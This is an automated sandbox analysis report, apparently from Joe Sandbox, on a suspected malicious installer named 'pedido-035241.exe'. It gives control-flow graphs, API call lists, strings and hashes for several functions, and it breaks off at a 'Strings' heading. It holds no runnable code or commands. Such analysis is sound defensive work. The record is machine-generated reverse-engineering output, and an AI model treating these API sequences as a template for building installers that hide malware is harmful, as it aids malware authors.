                                                                                                                                                                            Function 00405C13 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 500 405c13-405c39 call 405ede 503 405c52-405c59 500->503 504 405c3b-405c4d DeleteFileW 500->504 506 405c5b-405c5d 503->506 507 405c6c-405c7c call 406507 503->507 505 405dcf-405dd3 504->505 508 405c63-405c66 506->508 509 405d7d-405d82 506->509 513 405c8b-405c8c call 405e22 507->513 514 405c7e-405c89 lstrcatW 507->514 508->507 508->509 509->505 512 405d84-405d87 509->512 515 405d91-405d99 call 40683d 512->515 516 405d89-405d8f 512->516 517 405c91-405c95 513->517 514->517 515->505 524 405d9b-405daf call 405dd6 call 405bcb 515->524 516->505 520 405ca1-405ca7 lstrcatW 517->520 521 405c97-405c9f 517->521 523 405cac-405cc8 lstrlenW FindFirstFileW 520->523 521->520 521->523 525 405d72-405d76 523->525 526 405cce-405cd6 523->526 540 405db1-405db4 524->540 541 405dc7-405dca call 405569 524->541 525->509 528 405d78 525->528 529 405cf6-405d0a call 406507 526->529 530 405cd8-405ce0 526->530 528->509 542 405d21-405d2c call 405bcb 529->542 543 405d0c-405d14 529->543 533 405ce2-405cea 530->533 534 405d55-405d65 FindNextFileW 530->534 533->529 539 405cec-405cf4 533->539 534->526 538 405d6b-405d6c FindClose 534->538 538->525 539->529 539->534 540->516 544 405db6-405dc5 call 405569 call 4062c7 540->544 541->505 553 405d4d-405d50 call 405569 542->553 554 405d2e-405d31 542->554 543->534 545 405d16-405d1f call 405c13 543->545 544->505 545->534 553->534 557 405d33-405d43 call 405569 call 4062c7 554->557 558 405d45-405d4b 554->558 557->534 558->534
                                                                                                                                                                            APIs
                                                                                                                                                                            • DeleteFileW.KERNELBASE(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C3C
                                                                                                                                                                            • lstrcatW.KERNEL32(00425710,\*.*,00425710,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C84
                                                                                                                                                                            • lstrcatW.KERNEL32(?,0040A014,?,00425710,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CA7
                                                                                                                                                                            • lstrlenW.KERNEL32(?,?,0040A014,?,00425710,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CAD
                                                                                                                                                                            • FindFirstFileW.KERNEL32(00425710,?,?,?,0040A014,?,00425710,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CBD
                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D5D
                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00405D6C
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                            • String ID: .$.$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                                                            • API String ID: 2035342205-4130279798
                                                                                                                                                                            • Opcode ID: d9acfb67b6692fe63fef00afaeab71217e0c0e788268e2aa2b253bff87fc1474
                                                                                                                                                                            • Instruction ID: 7f21bfa76759dd048c017f5e8d67b30635c21f713a141b53f9c1cb2b61cba077
                                                                                                                                                                            • Opcode Fuzzy Hash: d9acfb67b6692fe63fef00afaeab71217e0c0e788268e2aa2b253bff87fc1474
                                                                                                                                                                            • Instruction Fuzzy Hash: BD419F30400A15BADB21AB619C8DAAF7B78EF41718F14817BF801721D1D77C4A82DEAE
                                                                                                                                                                            Function 00406BFE Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 727 406bfe-406c03 728 406c74-406c92 727->728 729 406c05-406c34 727->729 732 40726a-40727f 728->732 730 406c36-406c39 729->730 731 406c3b-406c3f 729->731 733 406c4b-406c4e 730->733 734 406c41-406c45 731->734 735 406c47 731->735 736 407281-407297 732->736 737 407299-4072af 732->737 738 406c50-406c59 733->738 739 406c6c-406c6f 733->739 734->733 735->733 740 4072b2-4072b9 736->740 737->740 743 406c5b 738->743 744 406c5e-406c6a 738->744 745 406e41-406e5f 739->745 741 4072e0-4072ec 740->741 742 4072bb-4072bf 740->742 755 406a82-406a8b 741->755 746 4072c5-4072dd 742->746 747 40746e-407478 742->747 743->744 751 406cd4-406d02 744->751 749 406e61-406e75 745->749 750 406e77-406e89 745->750 746->741 752 407484-407497 747->752 756 406e8c-406e96 749->756 750->756 753 406d04-406d1c 751->753 754 406d1e-406d38 751->754 758 40749c-4074a0 752->758 757 406d3b-406d45 753->757 754->757 761 406a91 755->761 762 407499 755->762 759 406e98 756->759 760 406e39-406e3f 756->760 764 406d4b 757->764 765 406cbc-406cc2 757->765 766 406e14-406e18 759->766 767 406fa9-406fb6 759->767 760->745 763 406ddd-406de7 760->763 768 406a98-406a9c 761->768 769 406bd8-406bf9 761->769 770 406b3d-406b41 761->770 771 406bad-406bb1 761->771 762->758 772 40742c-407436 763->772 773 406ded-406e0f 763->773 789 406ca1-406cb9 764->789 790 407408-407412 764->790 774 406d75-406d7b 765->774 775 406cc8-406cce 765->775 778 407420-40742a 766->778 779 406e1e-406e36 766->779 767->755 768->752 783 406aa2-406aaf 768->783 769->732 781 406b47-406b60 770->781 782 4073ed-4073f7 770->782 776 406bb7-406bcb 771->776 777 4073fc-407406 771->777 772->752 773->767 785 406dd9 774->785 787 406d7d-406d9b 774->787 775->751 775->785 786 406bce-406bd6 776->786 777->752 778->752 779->760 788 406b63-406b67 781->788 782->752 783->762 784 406ab5-406afb 783->784 791 406b23-406b25 784->791 792 406afd-406b01 784->792 785->763 786->769 786->771 793 406db3-406dc5 787->793 794 406d9d-406db1 787->794 788->770 795 406b69-406b6f 788->795 789->765 790->752 798 406b33-406b3b 791->798 799 406b27-406b31 791->799 796 406b03-406b06 GlobalFree 792->796 797 406b0c-406b1a GlobalAlloc 792->797 800 406dc8-406dd2 793->800 794->800 801 406b71-406b78 795->801 802 406b99-406bab 795->802 796->797 797->762 803 406b20 797->803 798->788 799->798 799->799 800->774 806 406dd4 800->806 804 406b83-406b93 GlobalAlloc 801->804 805 406b7a-406b7d GlobalFree 801->805 802->786 803->791 804->762 804->802 805->804 808 407414-40741e 806->808 809 406d5a-406d72 806->809 808->752 809->774
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: af4ab007fdbe3f375d412e85a9ad171fc41423b9a3793faa0b4874eb523c0645
                                                                                                                                                                            • Instruction ID: 53db679fe0595a89c24929100efc96b5d5a2697a31689bd0580b70dbb8294089
                                                                                                                                                                            • Opcode Fuzzy Hash: af4ab007fdbe3f375d412e85a9ad171fc41423b9a3793faa0b4874eb523c0645
                                                                                                                                                                            • Instruction Fuzzy Hash: 55F17770D04269CBDF18CFA8C8946ADBBB0FF44305F25816ED856BB281D7786A86CF45
                                                                                                                                                                            Function 0040683D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • FindFirstFileW.KERNELBASE(74DF3420,00426758,00425F10,00405F27,00425F10,00425F10,00000000,00425F10,00425F10,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00406848
                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00406854
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                                                                                            • String ID: XgB
                                                                                                                                                                            • API String ID: 2295610775-796949446
                                                                                                                                                                            • Opcode ID: 23f64898245c7a8b5642f2b76d490ae2c21be458ceb9b1f3c1c58d2291370735
                                                                                                                                                                            • Instruction ID: 6b6802a92a84c0d1895eb5c997cd82d97c30a63e480feb254935e86212d72bfe
                                                                                                                                                                            • Opcode Fuzzy Hash: 23f64898245c7a8b5642f2b76d490ae2c21be458ceb9b1f3c1c58d2291370735
                                                                                                                                                                            • Instruction Fuzzy Hash: 4AD0C9325051205BC2402638AF0C84B6B9A9F563313228A36B5A6E11A0C6348C3286AC
                                                                                                                                                                            Function 00403F64 Relevance: 51.4, APIs: 34, Instructions: 357windowstringCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 194 403f64-403f76 195 403f7c-403f82 194->195 196 4040dd-4040ec 194->196 195->196 199 403f88-403f91 195->199 197 40413b-404150 196->197 198 4040ee-404136 GetDlgItem * 2 call 404463 SetClassLongW call 40140b 196->198 201 404190-404195 call 4044af 197->201 202 404152-404155 197->202 198->197 203 403f93-403fa0 SetWindowPos 199->203 204 403fa6-403fad 199->204 218 40419a-4041b5 201->218 206 404157-404162 call 401389 202->206 207 404188-40418a 202->207 203->204 209 403ff1-403ff7 204->209 210 403faf-403fc9 ShowWindow 204->210 206->207 234 404164-404183 SendMessageW 206->234 207->201 217 404430 207->217 214 404010-404013 209->214 215 403ff9-40400b DestroyWindow 209->215 211 4040ca-4040d8 call 4044ca 210->211 212 403fcf-403fe2 GetWindowLongW 210->212 222 404432-404439 211->222 212->211 219 403fe8-403feb ShowWindow 212->219 223 404015-404021 SetWindowLongW 214->223 224 404026-40402c 214->224 221 40440d-404413 215->221 217->222 227 4041b7-4041b9 call 40140b 218->227 228 4041be-4041c4 218->228 219->209 221->217 230 404415-40441b 221->230 223->222 224->211 233 404032-404041 GetDlgItem 224->233 227->228 231 4041ca-4041d5 228->231 232 4043ee-404407 DestroyWindow EndDialog 228->232 230->217 236 40441d-404426 ShowWindow 230->236 231->232 237 4041db-404228 call 406544 call 404463 * 3 GetDlgItem 231->237 232->221 238 404060-404063 233->238 239 404043-40405a SendMessageW IsWindowEnabled 233->239 234->222 236->217 266 404232-40426e ShowWindow KiUserCallbackDispatcher call 404485 EnableWindow 237->266 267 40422a-40422f 237->267 241 404065-404066 238->241 242 404068-40406b 238->242 239->217 239->238 244 404096-40409b call 40443c 241->244 245 404079-40407e 242->245 246 40406d-404073 242->246 244->211 249 4040b4-4040c4 SendMessageW 245->249 251 404080-404086 245->251 246->249 250 404075-404077 246->250 249->211 250->244 252 404088-40408e call 40140b 251->252 253 40409d-4040a6 call 40140b 251->253 262 404094 252->262 253->211 263 4040a8-4040b2 253->263 262->244 263->262 270 404270-404271 266->270 271 404273 266->271 267->266 272 404275-4042a3 GetSystemMenu EnableMenuItem SendMessageW 270->272 271->272 273 4042a5-4042b6 SendMessageW 272->273 274 4042b8 272->274 275 4042be-4042fd call 404498 call 403f45 call 406507 lstrlenW call 406544 SetWindowTextW call 401389 273->275 274->275 275->218 286 404303-404305 275->286 286->218 287 40430b-40430f 286->287 288 404311-404317 287->288 289 40432e-404342 DestroyWindow 287->289 288->217 290 40431d-404323 288->290 289->221 291 404348-404375 CreateDialogParamW 289->291 290->218 292 404329 290->292 291->221 293 40437b-4043d2 call 404463 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 291->293 292->217 293->217 298 4043d4-4043e7 ShowWindow call 4044af 293->298 300 4043ec 298->300 300->221
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FA0
                                                                                                                                                                            • ShowWindow.USER32(?), ref: 00403FC0
                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00403FD2
                                                                                                                                                                            • ShowWindow.USER32(?,00000004), ref: 00403FEB
                                                                                                                                                                            • DestroyWindow.USER32 ref: 00403FFF
                                                                                                                                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404018
                                                                                                                                                                            • GetDlgItem.USER32(?,?), ref: 00404037
                                                                                                                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 0040404B
                                                                                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 00404052
                                                                                                                                                                            • GetDlgItem.USER32(?,00000001), ref: 004040FD
                                                                                                                                                                            • GetDlgItem.USER32(?,00000002), ref: 00404107
                                                                                                                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 00404121
                                                                                                                                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404172
                                                                                                                                                                            • GetDlgItem.USER32(?,00000003), ref: 00404218
                                                                                                                                                                            • ShowWindow.USER32(00000000,?), ref: 00404239
                                                                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040424B
                                                                                                                                                                            • EnableWindow.USER32(?,?), ref: 00404266
                                                                                                                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040427C
                                                                                                                                                                            • EnableMenuItem.USER32(00000000), ref: 00404283
                                                                                                                                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040429B
                                                                                                                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042AE
                                                                                                                                                                            • lstrlenW.KERNEL32(00423708,?,00423708,00000000), ref: 004042D8
                                                                                                                                                                            • SetWindowTextW.USER32(?,00423708), ref: 004042EC
                                                                                                                                                                            • ShowWindow.USER32(?,0000000A), ref: 00404420
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 121052019-0
                                                                                                                                                                            • Opcode ID: 66e8e1124669f3008a4bd8227f077bc543d240224f138d8a0267bdb9be33da1e
                                                                                                                                                                            • Instruction ID: 63d0405a778065079f0a8243b170f3468528db945c37da0c1c9e117f306831cd
                                                                                                                                                                            • Opcode Fuzzy Hash: 66e8e1124669f3008a4bd8227f077bc543d240224f138d8a0267bdb9be33da1e
                                                                                                                                                                            • Instruction Fuzzy Hash: 30C1D2B1600205EBDB306F61ED89E3A3A68EB94709F51053EF791B11F0CB795852DB2E
                                                                                                                                                                            Function 00403BB6 Relevance: 44.0, APIs: 13, Strings: 12, Instructions: 215stringregistryCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 301 403bb6-403bce call 4068d4 304 403bd0-403be0 call 40644e 301->304 305 403be2-403c19 call 4063d5 301->305 314 403c3c-403c65 call 403e8c call 405ede 304->314 310 403c31-403c37 lstrcatW 305->310 311 403c1b-403c2c call 4063d5 305->311 310->314 311->310 319 403cf7-403cff call 405ede 314->319 320 403c6b-403c70 314->320 326 403d01-403d08 call 406544 319->326 327 403d0d-403d32 LoadImageW 319->327 320->319 321 403c76-403c9e call 4063d5 320->321 321->319 328 403ca0-403ca4 321->328 326->327 330 403db3-403dbb call 40140b 327->330 331 403d34-403d64 RegisterClassW 327->331 332 403cb6-403cc2 lstrlenW 328->332 333 403ca6-403cb3 call 405e03 328->333 344 403dc5-403dd0 call 403e8c 330->344 345 403dbd-403dc0 330->345 334 403e82 331->334 335 403d6a-403dae SystemParametersInfoW CreateWindowExW 331->335 339 403cc4-403cd2 lstrcmpiW 332->339 340 403cea-403cf2 call 405dd6 call 406507 332->340 333->332 338 403e84-403e8b 334->338 335->330 339->340 343 403cd4-403cde GetFileAttributesW 339->343 340->319 348 403ce0-403ce2 343->348 349 403ce4-403ce5 call 405e22 343->349 354 403dd6-403df0 ShowWindow call 406864 344->354 355 403e59-403e5a call 40563c 344->355 345->338 348->340 348->349 349->340 362 403df2-403df7 call 406864 354->362 363 403dfc-403e0e GetClassInfoW 354->363 359 403e5f-403e61 355->359 360 403e63-403e69 359->360 361 403e7b-403e7d call 40140b 359->361 360->345 364 403e6f-403e76 call 40140b 360->364 361->334 362->363 367 403e10-403e20 GetClassInfoW RegisterClassW 363->367 368 403e26-403e49 DialogBoxParamW call 40140b 363->368 364->345 367->368 372 403e4e-403e57 call 403b06 368->372 372->338
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 004068D4: GetModuleHandleA.KERNEL32(?,00000020,?,00403607,0000000B), ref: 004068E6
                                                                                                                                                                              • Part of subcall function 004068D4: GetProcAddress.KERNEL32(00000000,?), ref: 00406901
                                                                                                                                                                            • lstrcatW.KERNEL32(1033,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000,00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,?,00000000,?), ref: 00403C37
                                                                                                                                                                            • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner,1033,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000,00000002,74DF3420), ref: 00403CB7
                                                                                                                                                                            • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner,1033,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000), ref: 00403CCA
                                                                                                                                                                            • GetFileAttributesW.KERNEL32(: Completed,?,00000000,?), ref: 00403CD5
                                                                                                                                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner), ref: 00403D1E
                                                                                                                                                                              • Part of subcall function 0040644E: wsprintfW.USER32 ref: 0040645B
                                                                                                                                                                            • RegisterClassW.USER32(004291C0), ref: 00403D5B
                                                                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403D73
                                                                                                                                                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DA8
                                                                                                                                                                            • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403DDE
                                                                                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit20W,004291C0), ref: 00403E0A
                                                                                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit,004291C0), ref: 00403E17
                                                                                                                                                                            • RegisterClassW.USER32(004291C0), ref: 00403E20
                                                                                                                                                                            • DialogBoxParamW.USER32(?,00000000,00403F64,00000000), ref: 00403E3F
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                            • String ID: .DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                                            • API String ID: 1975747703-1964700046
                                                                                                                                                                            • Opcode ID: 6641f25268bcb411ff60996ee06ee97a96bb8d093e03f8a241686f6243dfe293
                                                                                                                                                                            • Instruction ID: f8e28dda484975e23f2397f6e39507faffe4a9094113ace64084d81fe028ea3a
                                                                                                                                                                            • Opcode Fuzzy Hash: 6641f25268bcb411ff60996ee06ee97a96bb8d093e03f8a241686f6243dfe293
                                                                                                                                                                            • Instruction Fuzzy Hash: B761D570244200BBD720AF66AD45F2B3A6CEB84B49F40453FFD41B62E1DB795912CA7D
                                                                                                                                                                            Function 0040307D Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181memoryCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 375 40307d-4030cb GetTickCount GetModuleFileNameW call 405ff7 378 4030d7-403105 call 406507 call 405e22 call 406507 GetFileSize 375->378 379 4030cd-4030d2 375->379 387 4031f0-4031fe call 403019 378->387 388 40310b 378->388 380 4032ad-4032b1 379->380 394 403200-403203 387->394 395 403253-403258 387->395 390 403110-403127 388->390 392 403129 390->392 393 40312b-403134 call 403499 390->393 392->393 401 40325a-403262 call 403019 393->401 402 40313a-403141 393->402 397 403205-40321d call 4034af call 403499 394->397 398 403227-403251 GlobalAlloc call 4034af call 4032b4 394->398 395->380 397->395 423 40321f-403225 397->423 398->395 421 403264-403275 398->421 401->395 406 403143-403157 call 405fb2 402->406 407 4031bd-4031c1 402->407 412 4031cb-4031d1 406->412 426 403159-403160 406->426 411 4031c3-4031ca call 403019 407->411 407->412 411->412 418 4031e0-4031e8 412->418 419 4031d3-4031dd call 4069c1 412->419 418->390 422 4031ee 418->422 419->418 428 403277 421->428 429 40327d-403282 421->429 422->387 423->395 423->398 426->412 427 403162-403169 426->427 427->412 431 40316b-403172 427->431 428->429 432 403283-403289 429->432 431->412 433 403174-40317b 431->433 432->432 434 40328b-4032a6 SetFilePointer call 405fb2 432->434 433->412 435 40317d-40319d 433->435 438 4032ab 434->438 435->395 437 4031a3-4031a7 435->437 439 4031a9-4031ad 437->439 440 4031af-4031b7 437->440 438->380 439->422 439->440 440->412 441 4031b9-4031bb 440->441 441->412
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 0040308E
                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\pedido-035241.exe,00000400,?,?,?,?,?,00403847,?), ref: 004030AA
                                                                                                                                                                              • Part of subcall function 00405FF7: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\pedido-035241.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
                                                                                                                                                                              • Part of subcall function 00405FF7: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D
                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\pedido-035241.exe,C:\Users\user\Desktop\pedido-035241.exe,80000000,00000003,?,?,?,?,?,00403847), ref: 004030F6
                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,G8@,?,?,?,?,?,00403847,?), ref: 0040322C
                                                                                                                                                                            Strings
